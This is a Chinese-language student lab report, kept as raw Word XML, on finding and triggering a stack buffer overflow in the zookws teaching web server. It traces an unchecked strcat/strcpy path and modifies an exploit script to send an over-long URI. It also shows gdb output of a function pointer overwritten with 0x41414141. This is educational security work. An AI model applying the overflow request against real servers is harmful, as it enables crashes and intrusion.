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</w:t>
      </w:r>
      <w:r>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 缓冲区溢出漏洞</w:t>
      </w:r>
      <w:r>
        <w:t>分析与验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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1170300728 汤添凝</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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、实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>分析一个Web服务器的逻辑，寻找缓冲区溢出漏洞并触发该漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>实验环境为Ubuntu，在VMware Player 虚拟机中的vm-6858运行。系统中有两个账号：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>- `root`，口令6858，用来安装软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>- `httpd`，口令6858，运行Web服务器和实验程序</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>本课程实验研究对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>一个web服务器`zookws`。该服务器上运行一个Python的web应用`zoobar`，web用户之间转移一种称为“zoobars”的货币。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr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服务器端包含以下主要文件：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 `clean-env.sh`脚本令程序每次运行时栈和内存布局都相同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 `zookld.c`: 启动`zook.conf`中所配置服务，如`zookd`和`zookfs`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 `zookd.c`: 将HTTP请求路由到相应服务，如`zookfs`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 `zookfs.c`: 提供静态文件或执行动态代码服务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 `http.c`: HTTP实现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 `index.html`: Web服务器首页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 `/zoobar`目录：zoobar服务实现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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4980940" cy="24479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服务器端采用CGI (Common Gateway Interface)技术，将客户端请求URL映射到脚本或者普通HTML文件。CGI脚本可以由任意程序语言实现，脚本只需将HTTP头部和HTML文档输出到标准输出。本例CGI由`/zoobar`目录中的python脚本实现，其中也包含一个数据库。本次实验，我们不需要关心具体zoobar服务内容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`zookd`和`zookfs`执行程序分别有两个版本：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 `*-exstack`版本有可执行的栈，将攻击代码注入到栈中缓冲区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 `*-nxstack`版本的栈不可执行，需要用其他技术来运行攻击代码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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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"/>
        </w:rPr>
        <w:t>本实验将利用缓冲区溢出漏洞攻击服务器，导致程序崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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缓冲区溢出存在的要素：数组（字符串），串处理/读取函数（写操作）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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数组：`char * s`, `char s[128]`, `int a[128]`, `void * p`。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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函数： `strcpy()`, `strcat()`, `sprintf()`, `vsprintf()`, `gets()`, `getc()`, `read()`, `scanf()`, `getenv()`。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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除了调用函数外，还可能通过`for/while {}`循环的方式来访问缓冲区。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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"/>
        </w:rPr>
        <w:t>这里通过搜索到的strcpy()函数，发现其输入未被检查长度，可以用作攻击突破口。输入过长的字符串，导致缓冲区溢出并返回到程序意料之外的位置，甚至运行攻击代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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 w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single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"/>
        </w:rPr>
        <w:t>下面正式开始实验过程阐述：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1、在源码中搜索一个‘危险’函数`strcpy()`。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-------------------------------------------------------------------------------$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grep -n 'strcpy' *.c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4886325" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="QQ图片2020102511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10251113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-------------------------------------------------------------------------------在`http.c`中找到了一处潜在漏洞，来具体看一下代码。（line 343）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-------------------------------------------------------------------------------void dir_join(char *dst, const char *dirname, const char *filename) {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strcpy(dst, dirname);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if (dst[strlen(dst) - 1] != '/')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strcat(dst, "/");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strcat(dst, filename);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}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`dir_join()`函数将`dirname`和`filename`先后拷贝到`dst`中。显然，这里并没有检查每一个字符串长度。若`dirname`长度比`dst`缓冲长，则`strcpy()`调用存在缓冲区溢出风险。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2、进一步检查使用`dir_join()`时是否存在导致缓冲区溢出的可能（line 350）：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-------------------------------------------------------------------------------void http_serve_directory(int fd, const char *pn) {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/* for directories, use index.html or similar in that directory */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static const char * const indices[] = {"index.html", "index.php", "index.cgi", NULL};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char name[1024];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struct stat st;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int i;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for (i = 0; indices[i]; i++) {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dir_join(name, pn, indices[i]);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if (stat(name, &amp;st) == 0 &amp;&amp; S_ISREG(st.st_mode)) {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    dir_join(name, getenv("SCRIPT_NAME"), indices[i]);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    break;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}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}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if (indices[i] == NULL) {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http_err(fd, 403, "No index file in %s", pn);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return;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}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http_serve(fd, name);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}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-------------------------------------------------------------------------------在`dir_join(name, pn, indices[i]);`调用中，`char name[]`长度为1024。`char * pn`长度待定。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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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继续查看`http_serve_directory()`调用情况。（line 273）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void http_serve(int fd, const char *name)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{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void (*handler)(int, const char *) = http_serve_none;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char pn[1024];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struct stat st;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getcwd(pn, sizeof(pn));</w:t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//获取当前工作目录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setenv("DOCUMENT_ROOT", pn, 1);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strcat(pn, name);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split_path(pn);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if (!stat(pn, &amp;st))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{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/* executable bits -- run as CGI script */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if (valid_cgi_script(&amp;st))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    handler = http_serve_executable;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else if (S_ISDIR(st.st_mode))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    handler = http_serve_directory;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else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    handler = http_serve_file;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}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handler(fd, pn);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}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-------------------------------------------------------------------------------`handler = http_serve_directory`，`handler()`中的`pn`长度1024，内容来自`getcwd()`加上`strcat(pn, name)`。若`name`过长，则`pn`长度也将过长。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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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通过进一步分析`http_serve()`调用过程，发现`name`内容来自于环境变量`REQUEST_URI`。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-------------------------------------------------------------------------------zookfs.c:47:   http_serve(sockfd, getenv("REQUEST_URI"));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-------------------------------------------------------------------------------该环境变量在`http.c`中`http_request_line()`函数中被设置。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-------------------------------------------------------------------------------http.c:107:    envp += sprintf(envp, "REQUEST_URI=%s", reqpath) + 1;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在`zookd.c`中，`http_request_line()`函数被`process_client()`函数调用。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-------------------------------------------------------------------------------zookd.c:70:    if ((errmsg = http_request_line(fd, reqpath, env, &amp;env_len)))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我们把这一漏洞命名为“LONG_URI”漏洞，回顾分析过程如下：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-------------------------------------------------------------------------------http.c:344:    strcpy(dst, dirname) // dst size = ?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|                                  //  |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dir_join(name, pn, indices[i]);   // name size = 1024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|                                //  |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handler(fd, pn);                // pn size = 1024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|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zookfs.c:47:    http_serve(sockfd, getenv("REQUEST_URI"));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|      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http.c:107:    envp += sprintf(envp, "REQUEST_URI=%s", reqpath) + 1;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|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zookd.c:70:    if ((errmsg = http_request_line(fd, reqpath, env, &amp;env_len)))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3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>、触发漏洞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首先，该漏洞必须能改写栈中的一个返回地址；其次，改写一些数据结构来用于夺取程序的控制流。撰写触发该漏洞的程序，并验证改程序可以导致web服务器崩溃（通过`dmesg | tail`, 使用`gdb`, 或直接观察）。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漏洞利用程序模板为`exploit-template.py`，该程序向服务器发送特殊请求。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1、首先启动服务：`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./clean-env.sh ./zookld zook-exstack.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>`。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u w:val="single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73040" cy="1103630"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="4" name="图片 4" descr="QQ图片2020102511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010251106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打开另一终端，执行`exploit-template.py`。下面是是未改写的`exploit-template.py`执行结果。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-------------------------------------------------------------------------------$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 xml:space="preserve"> ./exploit-template.py 127.0.0.1 8080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69865" cy="2866390"/>
            <wp:effectExtent l="0" t="0" r="6985" b="635"/>
            <wp:docPr id="5" name="图片 5" descr="QQ图片2020102511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010251120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我们发现了可由我们控制的用户输入，客户端请求位于下面代码中： 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##  This is the function that you should modify to construct an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##  HTTP request that will cause a buffer overflow in some part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##  of the zookws web server and exploit it.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def build_exploit(shellcode):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## Things that you might find useful in constructing your exploit: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##   urllib.quote(s)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##     returns string s with "special" characters percent-encoded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##   struct.pack("&lt;I", x)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##     returns the 4-byte binary encoding of the 32-bit integer x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##   variables for program addresses (ebp, buffer, retaddr=ebp+4)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req =   "GET / HTTP/1.0\r\n" + \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    "\r\n"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return req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目前，我们手上有了两个攻击服务器的武器：(1) “LONG_URI”缓冲区溢出漏洞，(2)构造请求输入`req`的脚本。下一步就是要分析`http.c`中处理该请求的代码，将`req`中内容和`REQUEST_URI`对应起来。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通过分析代码可以发现，HTTP请求中的路径，例如`/foo.html`，被赋予了`REQUEST_URI`变量，因此可以通过构造较长的HTTP请求路径来令缓冲区溢出。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下面的代码有删节。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const char *http_request_line(int fd, char *reqpath, char *env, size_t *env_len)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{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static char buf[8192];      /* static variables are not on the stack */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char *sp1, *sp2, *qp, *envp = env;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//  ... ... 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if (http_read_line(fd, buf, sizeof(buf)) &lt; 0)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return "Socket IO error";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/* Parse request like "GET /foo.html HTTP/1.0" */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sp1 = strchr(buf, ' ');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if (!sp1)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return "Cannot parse HTTP request (1)";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*sp1 = '\0';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sp1++;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if (*sp1 != '/')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return "Bad request path";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sp2 = strchr(sp1, ' ');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if (!sp2)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return "Cannot parse HTTP request (2)";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*sp2 = '\0';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sp2++;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//  ... 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/* decode URL escape sequences in the requested path into reqpath */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url_decode(reqpath, sp1);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envp += sprintf(envp, "REQUEST_URI=%s", reqpath) + 1;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//  ... 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}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2、之前发现缓冲区有1024字节，我们就令请求路径超过1024字节。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具体修改方法如下：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2.1 输入`vim exploit-template.py`进入文件开始修改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httpd@vm-6858:~/lab$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vim exploit-template.py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2.2 按下字母`i`，进入插入模式修改文件内容，令请求路径超过1024字节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req =   "GET /" + 'A' * 1024 + " HTTP/1.0\r\n" + \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    "\r\n"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2.3 修改完成后，按下“Esc”键转到命令行模式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2.4 将攻击脚本复制两份，命名为`exploit-2a.py`和`exploit-2b.py`，并修改文件的权限，使其可执行。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:w exploit-2a.py</w:t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//另存为exploit-2a.py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:w exploit-2a.py</w:t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//另存为exploit-2b.py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:q!</w:t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//不存盘强制退出vi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httpd@vm-6858:~/lab$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chmod 755 exploit-2a.py</w:t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//修改exploit-2a.py的权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:ind w:firstLine="420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httpd@vm-6858:~/lab$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chmod 755 exploit-2b.py</w:t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//修改exploit-2b.py的权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4143375" cy="314325"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="QQ图片2020102511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010251125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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single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用`make check-crash`来验证是否导致程序崩溃。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$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make check-crash</w:t>
      </w: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71135" cy="1105535"/>
            <wp:effectExtent l="0" t="0" r="5715" b="8890"/>
            <wp:docPr id="8" name="图片 8" descr="QQ图片20201025114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010251142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该程序并通过(PASS)了检查。缓冲区漏洞导致程序因为SIGSEV信号而崩溃，指令地址被改写为`si_addr=0x41414141`。下面看看具体发生了什么。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4、使用`gdb -p 进程号`来调试程序。进程号可通过两种方法获得：观察`zookld`在终端输出子进程ID；或者使用`pgrep`，例如`gdb -p $(pgrep zookd-exstack)`。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使用`gdb`过程中，当父进程`zookld`被`^C`杀死时，被`gdb`调试的子进程并不会被终止。这将导致无法重启web服务器。因此，在重启`zookld`之前，应先退出`gdb`。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当生成子进程时，`gdb`缺省情况下仍然调试父进程，而不会跟踪子进程。由于`zookfs`为每个服务请求生成一个子进程，为了自动跟踪子进程，使用`set follow-fork-mode child`命令。该命令已经被加入`/home/httpd/lab/.gdbinit`中，`gdb`启动时会自动执行。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调试流程如下：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①. 在终端1中，重启服务：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`$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./clean-env.sh ./zookld zook-exstack.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>`。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr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eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="1042035"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="9" name="图片 9" descr="QQ图片2020102711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010271117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②. 在终端2中，启动`gdb`（`gdb -p PID`），并设置断点（`b`命令）。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③. 在终端3中，运行漏洞触发程序 `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>./exploit-2a.py localhost 8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>`。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④. 返回终端2，继续调试（`c`命令）。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4.1 首先，调试`zookd`。`http_request_line`负责处理HTTP请求。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u w:val="single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$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gdb -p $(pgrep zookd-exstack)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43195" cy="2232660"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="7" name="图片 7" descr="QQ图片2020102511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01025115125"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect r="11135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b http_request_line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Breakpoint 1 at 0x8049150: file http.c, line 67.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[运行漏洞触发程序]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c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Continuing.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73675" cy="882650"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="10" name="图片 10" descr="QQ图片2020102511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201025115240"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="215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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single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Breakpoint 1, http_request_line (fd=5, reqpath=0xbfffee08 "", env=0x804e520 &lt;env&gt; "", env_len=0x8050520 &lt;env_len&gt;) at http.c:67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warning: Source file is more recent than executable.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67          char *sp1, *sp2, *qp, *envp = env; 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[执行n多次直到REQUEST_URI被处理完]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n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eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3272155"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="11" name="图片 11" descr="QQ图片2020102511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2010251156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109         envp += sprintf(envp, "SERVER_NAME=zoobar.org") + 1;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x/10s buf</w:t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  [打印buf，请求中各字段已经被分割]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0x8050540 &lt;buf.4435&gt;:   "GET"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0x8050544 &lt;buf.4435+4&gt;: "/", 'A' &lt;repeats 199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0x805060c &lt;buf.4435+204&gt;:  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0x80506d4 &lt;buf.4435+404&gt;:  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0x805079c &lt;buf.4435+604&gt;:  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0x8050864 &lt;buf.4435+804&gt;:  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0x805092c &lt;buf.4435+1004&gt;:      'A' &lt;repeats 25 times&gt;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0x8050946 &lt;buf.4435+1030&gt;:      "HTTP/1.0"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0x805094f &lt;buf.4435+1039&gt;:      ""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0x8050950 &lt;buf.4435+1040&gt;:      ""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x/10 reqpath</w:t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[打印reqpath，为"/", A * 1024]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0xbfffee08:     "/", 'A' &lt;repeats 199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0xbfffeed0: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0xbfffef98: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0xbffff060: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0xbffff128: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0xbffff1f0:     'A' &lt;repeats 25 times&gt;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0xbffff20a:     "\005\b|\365\377\277"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0xbffff211:     ""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0xbffff212:     ""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0xbffff213:     ""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68595" cy="3136900"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
            <wp:docPr id="12" name="图片 12" descr="QQ图片2020102511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2010251157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[继续用n命令执行]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72405" cy="2952115"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="13" name="图片 13" descr="QQ图片20201025115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2010251158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85          if (sendfd(svcfds[i], env, env_len, fd) &lt;= 0)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[此时zookd将请求发送给zookfs]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single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p sizeof reqpath</w:t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[reqpath不会溢出]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$3 = 2048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p sizeof env</w:t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  [env不会溢出]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$4 = 8192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quit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u w:val="single"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="ar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eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4203700" cy="885825"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="QQ图片2020102511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201025115910"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect r="19882" b="21511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`zookd`此时并不存在缓冲区溢出。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4.2接下来分析`zookfs`。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在`zookfs.c`中，`http_serve()`函数以`REQUEST_URI`环境变量为参数。在`http_serve`处设置断点，分析栈结构。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  <w:ind w:firstLine="420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$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gdb -p $(pgrep zookfs-exstack)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none"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>b http_serve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Breakpoint 1 at 0x804951c: file http.c, line 275.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[运行漏洞触发程序]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69230" cy="2009775"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="17" name="图片 17" descr="QQ图片2020102711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图片202010271118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c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Continuing.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[New process 5076]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[Switching to process 5076]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Breakpoint 1, http_serve (fd=3, name=0x80510b4 "/", 'A' &lt;repeats 199 times&gt;...) at http.c:275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warning: Source file is more recent than executable.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275         void (*handler)(int, const char *) = http_serve_none;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p $ebp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$1 = (void *) 0xbfffde08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(gdb)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 xml:space="preserve"> p &amp;handler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$2 = (void (**)(int, const char *)) 0xbfffddfc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p &amp;pn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$3 = (char (*)[1024]) 0xbfffd9fc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p &amp;st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$4 = (struct stat *) 0xbfffd9a4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p &amp;fd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$5 = (int *) 0xbfffde10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P &amp;name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$6 = (const char **) 0xbfffde14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x $ebp+4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0xbfffde0c:     0x08048d86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69230" cy="2660015"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6985"/>
            <wp:docPr id="18" name="图片 18" descr="QQ图片2020102711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图片202010271120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</w:pP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根据上面的调试信息绘制`http_serve()`的栈结构：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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3904615" cy="3980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继续执行到`strcat()`，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279         getcwd(pn, sizeof(pn));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(gdb)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 xml:space="preserve"> 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280         setenv("DOCUMENT_ROOT", pn, 1);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282         strcat(pn, name);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(gdb)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 xml:space="preserve"> p pn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$7 = "/home/httpd/lab\000", 'A' &lt;repeats 504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(gdb)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 xml:space="preserve"> p strlen(name)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$8 = 1025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p sizeof pn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$9 = 1024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67325" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="QQ图片2020102711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图片2020102711225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此处将执行`strcat()`，在`pn`中已经包含的来自`getcwd()`的字符串后面加上长度1025的`name`，将超过`pn`所分配的大小1024，导致缓冲区溢出。接着执行一步，并查看缓冲区溢出情况。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283         split_path(pn);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x/10s pn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0xbfffd9fc:     "/home/httpd/lab/", 'A' &lt;repeats 184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0xbfffdac4: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0xbfffdb8c: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0xbfffdc54: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0xbfffdd1c:     'A' &lt;repeats 200 times&gt;...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0xbfffdde4:     'A' &lt;repeats 40 times&gt;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0xbfffde0d:     "\215\004\b\003"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0xbfffde12:     ""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0xbfffde13:     ""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0xbfffde14:     "\264\020\005\b"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x &amp;handler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0xbfffddfc:     'A' &lt;repeats 16 times&gt;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x $ebp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0xbfffde08:     "AAAA"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x $ebp+4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0xbfffde0c:     ""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在`pn`之前的缓冲区，包括`handler`和`$ebp`，已经被字符`A`覆盖，但返回地址并没有被完全改写。该如何改写?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285         if (!stat(pn, &amp;st))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(gdb)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 xml:space="preserve"> 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296         handler(fd, pn);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(gdb) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>n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Program received signal SIGSEGV, Segmentation fault.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0x41414141 in ?? ()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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5273675" cy="4125595"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="20" name="图片 20" descr="QQ图片20201027112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图片202010271123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(gdb) bt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# 0  0x41414141 in ?? ()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# 1  0x080495e8 in http_serve (fd=3, name=0x80510b4 "/", 'A' &lt;repeats 199 times&gt;...) at http.c:296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# 2  0x08048d00 in main (argc=&lt;error reading variable: Cannot access memory at address 0x41414149&gt;,</w:t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   argv=&lt;error reading variable: Cannot access memory at address 0x4141414d&gt;) at zookfs.c:39</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4756785" cy="748030"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="21" name="图片 21" descr="QQ图片2020102711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图片202010271124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bidi="ar"/>
        </w:rPr>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>继续执行到`handler(fd, pn);`，由于`handler`变量被改写为`0x41414141`，导致程序崩溃。这发生在先前发现的`strcpy()`漏洞之前。这个示例并没有利用改写返回地址来劫持控制流。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2F9EE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="29C2F9E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D9D173"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="59D9D17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11EC"/>
    <w:rsid w:val="584A79BD"/>
    <w:rsid w:val="67896710"/>
    <w:rsid w:val="7DFD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hint="eastAsia" w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="Normal (Web)"/>
